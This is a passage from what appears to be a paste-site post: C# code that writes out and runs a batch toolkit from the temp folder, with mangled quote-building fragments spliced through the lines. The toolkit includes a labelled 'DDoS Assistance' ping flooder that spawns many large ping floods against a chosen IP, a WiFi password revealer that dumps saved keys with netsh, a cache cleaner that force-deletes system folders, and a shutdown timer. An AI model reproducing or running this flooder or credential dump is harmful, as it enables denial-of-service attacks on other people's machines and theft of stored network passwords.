- " goto validip4"
- ")"
- ":validip4"
- ">nul find "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"PING: transmit failed. General failure."Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %DIR%\\text.dat && ("
- " goto invalidip"
- ") || ("
- " goto validip"
- ")"
- ""
- ":validip"
- "cls"
- "echo. >> %DIR%\\history.log"
- "echo %date% IP: %ip% >> %DIR%\\history.log"
- "echo - IP is Valid -"
- "echo Package limit 32 - 60000"
- "echo."
- "echo F) Detect Package"
- "echo E) Back"
- "echo."
- "set /p package= Package: "
- "if %package%==f goto find"
- "if %package%==F goto find"
- "if %package%==e goto start"
- "if %package%==E goto start"
- "if %package%==%package% goto pack"
- ""
- ":pack"
- "echo exit >> %DIR%\\info.bat"
- "echo title DDoS Assistance >> %DIR%\\DDoS-Assistance.bat"
- "echo ping %ip% -t -l %package% >>%DIR%\\DDoS-Assistance.bat"
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"launch=1"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- ""
- ":ddoslauncher"
- "start /min %DIR%\\DDoS-Assistance.bat"
- "set /a launch=%launch%1"
- "if %launch%==10 goto lmao"
- "goto ddoslauncher"
- ""
- ":lmao"
- "cls"
- "echo."
- "ping %IP% -t -l %package% "
- "exit"
- ""
- ":list"
- "cls"
- "if exist %DIR%\\history.log type %DIR%\\history.log"
- "echo."
- "echo."
- "echo C)Clear E)Back"
- "echo."
- "echo."
- "set /p ip="
- "if %ip%==c goto clear"
- "if %ip%==e goto start"
- ":clear"
- "del %DIR%\\history.log"
- "goto start"
- ""
- ":find"
- "cls"
- "set /a package=11000"
- "echo title Package Detector >> %DIR%\\Package-Detector.bat"
- "echo :beginning >> %DIR%\\Package-Detector.bat"
- "echo if exist %DIR%\\info.bat call %DIR%\\info.bat >> %DIR%\\Package-Detector.bat"
- "echo goto beginning >> %DIR%\\Package-Detector.bat"
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"launch=1"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- ""
- ":launcher"
- "start /min %DIR%\\Package-Detector.bat"
- "set /a launch=%launch%1"
- "if %launch%==12 goto resetfind"
- "goto launcher"
- ""
- ":resetfind"
- "if exist %DIR%\\info.bat del %DIR%\\info.bat"
- "set /a package=%package% - 1000"
- "if %package%==0 goto invalidip"
- "echo."
- "echo Testing Package: %package%"
- "echo ping %ip% -l %package% -t -n 1 >> %DIR%\\info.bat"
- "if exist %DIR%\\text.dat del %DIR%\\text.dat"
- "ping %ip% -l %package% -t -n 2 >> %DIR%\\text.dat -n 2"
- ">nul find "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Request timed out."Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %DIR%\\text.dat && ("
- " goto resetfind"
- ") || ("
- " goto pack"
- ")"
- ""
- ":invalidip"
- "color c"
- "echo - IP Does Not Exist -"
- "ping localhost -n 2 >NUL"
- "goto start"
- ""
- ":init"
- "setlocal EnableDelayedExpansion"
- "for /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=1,2 delims=#"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%a in ('"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"prompt #$H#$E# & echo on & for %%b in (1) do rem"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"') do ("
- " set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"DEL=%%a"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- ")"
- "<nul> X set /p "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })".=."Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "goto start"
- ""
- ":color"
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"param=^%~2"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" !"
- "set "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"param=!param:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"=\\"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"!"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- "findstr /p /A:%1 "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"."Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"!param!\\..\\X"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" nul"
- "<nul set /p "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })".=%DEL%%DEL%%DEL%%DEL%%DEL%%DEL%%DEL%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""
- ""
- ":cachecleanertool"
- "cls"
- "@echo off"
- "@mode con cols=85 lines=35"
- "title Cache/Cookies cleaner"
- "color a"
- "echo."
- "echo."
- "echo @@@@ @@@@ "
- "echo @@@@@@@@@@@ @@@@ "
- "echo @@@@@ @@ @@@@ "
- "echo @@@@@ @@@@@@@@@ @@@@@@@@ @@@@ @@@@@@@ @@@@@@@@ "
- "echo @@@@ @@@@ @@@@@ @@@@@@@@@@ @@@@@@@@@@@@@ @@@@ @@@@ "
- "echo @@@@@ @@@ @@@@ @@@@@ @@@@ @@@@ @@@ "
- "echo @@@@ @@@@@@@@@ @@@@ @@@@ @@@@ @@@@@@@@@@@@@@ "
- "echo @@@@ @@@@@ @@@@ @@@@ @@@@ @@@@ @@@@@ "
- "echo @@@@@ @ @@@@ @@@ @@@@ @ @@@@ @@@@ @@@@ "
- "echo @@@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@ @@@@ @@@@ @@@@@@@@@@@ "
- "echo @@@@ @@ @@@ @@@ "
- "echo."
- "echo @@@ "
- "echo @@@ "
- "echo @@@ "
- "echo @@@@@@@ @@@ @@@@@@@@ @@@@@@@@@ @@ @@@@@@@ "
- "echo @@@@@@@@@@ @@@@ @@@@ @@@@ @@@@ @@@@@ @@@@@@@@@@@@ "
- "echo @@@@ @@@ @@@@ @@@@ @@@@ @@@@ @@@@@ "
- "echo @@@@ @@@ @@@@@@@@@@@@@ @@@@@@@@@@ @@@ @@@@ "
- "echo @@@@ @@@ @@@@ @@@@@ @@@@@ @@@ @@@@ "
- "echo @@@@@ @ @@@@ @@@@ @@@@ @@@@ @@@ @@@@ "
- "echo @@@@@@@@@@ @@@@ @@@@@@@@@@@ @@@@@@@@@@@@ @@@ @@@@ "
- "echo @@@ @@@@ @@ "
- "echo."
- "echo."
- "echo."
- "echo Can boost your internet browsing ... "
- "echo."
- "echo Start cleaner ? [Yes]"
- "set /p main="
- "if %main% == Yes goto clean"
- ""
- ""
- ":clean"
- "del /s /f /q c:\\windows\\temp\\*.*"
- "rd /s /q c:\\windows\\temp"
- "md c:\\windows\\temp"
- "del /s /f /q C:\\WINDOWS\\Prefetch"
- "del /s /f /q %temp%\\*.*"
- "rd /s /q %temp%"
- "md %temp%"
- "deltree /y c:\\windows\\tempor~1"
- "deltree /y c:\\windows\\temp"
- "deltree /y c:\\windows\\tmp"
- "deltree /y c:\\windows\\ff*.tmp"
- "deltree /y c:\\windows\\history"
- "deltree /y c:\\windows\\cookies"
- "deltree /y c:\\windows\\recent"
- "deltree /y c:\\windows\\spool\\printers"
- "del c:\\WIN386.SWP"
- "timeout 2 >nul"
- "cls"
- "goto done"
- ""
- ":done"
- "echo."
- "echo @@@@@@@@@@@@@@ "
- "echo @@@@@ @@@@@ "
- "echo @@@@ @@@@ @@@@@@@@ @@ @@@@@ @@@@@@@ "
- "echo @@@@ @@@@ @@@@@ @@@@@ @@@@@@@@@@@@@ @@@@ @@@@ "
- "echo @@@@ @@@@ @@@@ @@@@ @@@@@ @@@@@ @@@@ @@@@ "
- "echo @@@@ @@@@ @@@@ @@@@ @@@@ @@@@ @@@@@@@@@@@@@ "
- "echo @@@@ @@@@ @@@@ @@@@ @@@@ @@@@ @@@@ "
- "echo @@@@@ @@@@@ @@@@ @@@@ @@@@ @@@@ @@@@ "
- "echo @@@@@@@@@@@@@@ @@@@@@@@@@@ @@@@ @@@@ @@@@@@@@@@@ "
- "echo @@@ @@@@ "
- "echo."
- "echo."
- "echo U will be moved to main menu"
- "timeout 2 >nul"
- "goto exit"
- ""
- ":exit"
- "cls"
- "goto %user%"
- ""
- ""
- ""
- ":wifipass"
- "@echo off"
- "color a"
- "setlocal enabledelayedexpansion"
- ""
- ":wifimain"
- " title WiFiPasswordReveal"
- " "
- " echo."
- " echo Reveal all saved WiFi passwords"
- " echo."
- ""
- " :: Get all the profiles"
- " call :get-profiles r"
- ""
- " :: For each profile, try to get the password"
- " :main-next-profile"
- " for /f "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"tokens=1* delims=,"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%a in ("Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%r%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })") do ("
- " call :get-profile-key "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%%a"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" key"
- " if "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"!key!"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" NEQ "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" ("
- " echo WiFi: [%%a] Password: [!key!]"
- " )"
- " set r=%%b"
- " )"
- " if "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%r%"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" NEQ "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })""Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" goto %user%-next-profile"
- ""
- " echo."
- " pause"
- ""
- "timeout 1 >nul"
- " goto exit"
- ""
- "::"
- ":: Get the WiFi key of a given profile"
- ":get-profile-key <1=profile-name> <2=out-profile-key>"
- " setlocal"
- ""
- " set result="
- ""
- " FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"usebackq tokens=2 delims=:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%a in ("
- " `netsh wlan show profile name^="Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"%~1"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" key^=clear ^| findstr /C:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"Key Content"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"`) DO ("
- " set result=%%a"
- " set result=!result:~1!"
- " )"
- " ("
- " endlocal"
- " set %2=%result%"
- " )"
- ""
- "timeout 1 >nul"
- " goto :eof"
- ""
- "::"
- ":: Get all network profiles (comma separated) into the result result-variable"
- ":get-profiles <1=result-variable>"
- " setlocal"
- ""
- " set result="
- ""
- " "
- " FOR /F "Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"usebackq tokens=2 delims=:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })" %%a in ("
- " `netsh wlan show profiles ^| findstr /C:"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"All User Profile"Encoding.ASCII.GetString(new byte[1]
- {
- 34
- })"`) DO ("
- " set val=%%a"
- " set val=!val:~1!"
- ""
- " set result=%!val!,!result!"
- " )"
- " ("
- " endlocal"
- " set %1=%result:~0,-1%"
- " )"
- "timeout 1 >nul"
- " goto :eof"
- ""
- ":exit"
- "cls"
- "timeout 1 >nul"
- "goto %user%"
- ""
- ""
- ""
- ""
- ":shutdowntimertool"
- "@echo off"
- "tittle Shutdown Timer"
- "mode 70,15"
- "color a"
- "echo ########################"
- "echo # #"
- "echo # Set timer (1) #"
- "echo # Cancel timer (2) #"
- "echo # Back to menu (3) #"
- "echo # #"
- "echo ########################"
- "echo Enter option [1-2] ..."
- "set /p main="
- "if %main% == 1 goto shutdown"
- "if %main% == 2 goto cancelshutdown"
- "if %main% == 3 goto %user%"
- ""
- ":cancelshutdown"
- "cls"
- "shutdown -a"
- "echo ------------------------------------------------"
- "echo Canceled"
- "echo ------------------------------------------------"
- "timeout 3 >nul"
- "goto %user%"
- ""
- ":shutdown"
- "cls"
- "echo. "
- "echo Shutdown Timer"
- "echo."
- "echo."
- "set /p var1= Enter time (in minutes) and press enter : "
- "set /a var2=%var1% * 60"
- "echo."
- "shutdown -s -f -t %var2%"
- "echo ------------------------------------------------"
- "echo Your PC will shutdown in %var1% min"
- "echo ------------------------------------------------"
- "echo."
- "echo."
- "echo Enjoy your movie :)"
- "echo."
- "timeout 3 >nul"
- "goto %user%"
- ""
- ""
- );
- Process.Start(Environment.GetEnvironmentVariable("TMP")"\\cmd.bat");
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment